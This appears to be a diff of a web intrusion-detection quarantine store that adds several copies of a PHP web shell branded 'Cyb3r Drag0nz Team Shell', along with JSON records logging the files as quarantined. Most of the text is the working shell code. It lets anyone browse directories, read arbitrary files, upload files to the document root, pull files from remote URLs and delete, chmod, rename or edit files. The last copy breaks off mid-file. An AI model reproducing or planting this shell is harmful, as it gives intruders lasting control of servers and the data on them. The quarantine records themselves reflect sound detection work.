$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5099",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353220,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/administrator/index.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/administrator/index.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5100",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/index.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/index.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783381496,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/index.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
